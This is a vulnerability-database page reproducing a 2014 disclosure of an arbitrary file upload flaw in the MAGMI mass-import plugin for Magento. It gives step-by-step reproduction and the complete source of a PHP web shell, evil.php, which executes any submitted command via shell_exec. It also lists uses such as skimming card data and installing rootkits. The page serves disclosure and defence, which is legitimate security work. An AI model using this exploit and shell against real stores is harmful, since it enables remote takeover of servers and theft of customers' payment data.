Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Magento Server MAGMI Plugin - Remote File Inclusion Vulnerability

🗓️ 26 Oct 2014 00:00:00Reported by Parvinder BhasinType 
zdt
 zdt🔗 0day.today👁 103 Views

Magento Server MAGMI Plugin - RFI Vulnerability 10/24/2014 Parvinder Singh Bhasi

Code
Exploit found date:  10/24/2014
Security Researcher name:  Parvinder Singh Bhasin
Contact info:  [email protected]
twitter:  @parvinderb <scorpio>
 
 
Currently tested version:
Magento version:  Magento CE - 1.8 and newer versions
MAGMI version: v0.7.17a and greater
 
MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability (RFI) which allows an attacker to upload essentially any PHP file (without any sanity checks).  This PHP file could then be used to skim credit card data, rewrite files, run remote commands, delete files..etc.  Essentially, this gives attacker ability to execute remote commands on the vulnerable server.
 
Even though the plugin is not Magento's own plugin, I feel since Magento's commerce platform is used by many sites for conducting business and that lot of their customers could be using the same plugin, Magento has the responsibility to inform it's  paid/unpaid customers of this vulnerability.  I would appreciate if my name appears as part of the disclosure.
 
Steps to reproduce:
 
1.  http://<a magentosite.com>/magmi/web/magmi.php
2.  Under upload new plugins:
    click on "choose file"
        MAGento plugins are basically php file zipped.  So create a php shell and zip the file. ex: evil.php  ex: zip file: evil_plugin.zip.  After the file has been uploaded, it will say:  Plugin packaged installed.
         
         evil.php:
          
         <?php
            if (isset($_POST['command'])){
                echo "<form action='evil.php' method='post'>
                <input type='text' name='command' value=''/>
                <input type='submit' value='execute'/>
                </form>";
    
                if(function_exists('shell_exec')) {
                    $command=$_POST['command'];
                    $output = shell_exec("$command");
                    echo "<pre>$output</pre>";
                }
            }
            else {
                echo "<form action='evil.php' method='post'>
                <input type='text' name='command' value=''/>
                <input type='submit' value='execute'/>
            </form>";
            }
        ?>
          
3.  Your malicious evil.php file is extracted now.  All you then need to do is just access the evil.php page from:
    http://<amagentosite.com>/magmi/plugins/evil.php
     
    At this point you could really have access to the entire system.  Download any malware, install rootkits, skim credit card data ..etc.etc.

#  0day.today [2018-01-11]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Oct 2014 00:00Current
7.1High risk
Vulners AI Score7.1
magentomagmifile inclusion1.8remote commandssecurity disclosurecredit card datavulnerabilityexploitserver
103